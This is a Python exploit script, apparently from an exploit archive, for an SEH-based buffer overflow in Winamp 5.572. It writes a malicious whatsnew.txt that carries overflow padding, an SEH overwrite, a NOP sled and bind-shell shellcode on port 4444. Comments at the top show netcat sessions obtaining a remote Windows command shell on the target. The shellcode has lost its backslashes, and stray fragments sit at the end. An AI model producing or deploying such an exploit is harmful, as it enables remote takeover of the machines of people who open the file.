Winamp 5.572 Exploit - SEH :

Date : 2010-01-26 Author : TecR0c
#!/usr/bin/python
#
################################################################
# 
# Exploit Title: Winamp
#
################################################################
#
# tecr0c@backtrack:~/exploits/winamp$ nc -v 192.168.2.24 4444
# 192.168.2.24: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.2.24] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesWinamp>exit
# exit
# tecr0c@backtrack:~/exploits/winamp$ nc -v 192.168.2.24 4444
# 192.168.2.24: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.2.24] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesWinamp>exit
# exit
# tecr0c@backtrack:~/exploits/winamp$ nc -v 192.168.2.24 4444
# 192.168.2.24: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.2.24] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesWinamp> 

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|								  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"


bind = (
"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x9axec"
"x40xbdx83xebxfcxe2xf4x66x86xabxf0x72x15xbfx42"
"x65x8cxcbxd1xbexc8xcbxf8xa6x67x3cxb8xe2xedxaf"
"x36xd5xf4xcbxe2xbaxedxabxf4x11xd8xcbxbcx74xdd"
"x80x24x36x68x80xc9x9dx2dx8axb0x9bx2exabx49xa1"
"xb8x64x95xefx09xcbxe2xbexedxabxdbx11xe0x0bx36"
"xc5xf0x41x56x99xc0xcbx34xf6xc8x5cxdcx59xddx9b"
"xd9x11xafx70x36xdaxe0xcbxcdx86x41xcbxfdx92xb2"
"x28x33xd4xe2xacxedx65x3ax26xeexfcx84x73x8fxf2"
"x9bx33x8fxc5xb8xbfx6dxf2x27xadx41xa1xbcxbfx6b"
"xc5x65xa5xdbx1bx01x48xbfxcfx86x42x42x4ax84x99"
"xb4x6fx41x17x42x4cxbfx13xeexc9xbfx03xeexd9xbf"
"xbfx6dxfcx84x51xe1xfcxbfxc9x5cx0fx84xe4xa7xea"
"x2bx17x42x4cx86x50xecxcfx13x90xd5x3ex41x6ex54"
"xcdx13x96xeexcfx13x90xd5x7fxa5xc6xf4xcdx13x96"
"xedxcexb8x15x42x4ax7fx28x5axe3x2ax39xeax65x3a"
"x15x42x4ax8ax2axd9xfcx84x23xd0x13x09x2axedxc3"
"xc5x8cx34x7dx86x04x34x78xddx80x4ex30x12x02x90"
"x64xaex6cx2ex17x96x78x16x31x47x28xcfx64x5fx56"
"x42xefxa8xbfx6bxc1xbbx12xecxcbxbdx2axbcxcbxbd"
"x15xecx65x3cx28x10x43xe9x8exeex65x3ax2ax42x65"
"xdbxbfx6dx11xbbxbcx3ex5ex88xbfx6bxc8x13x90xd5"
"x6ax66x44xe2xc9x13x96x42x4axecx40xbd")

buff = "Winamp 5.572"
buff += "x41" * 672
buff += "xebx06x90x90"
buff += "x46x59xb0x01"
buff += "x90" * 30
buff += bind
buff += "xcc" * (6000-len(buff))


try:
   zip = open("whatsnew.txt",'w')
   zip.write(buff)
   zip.close()
   print "[+] Vulnerable file created!
"
except:
   print "[-] Error occured!"

C1

 

C2

 

C3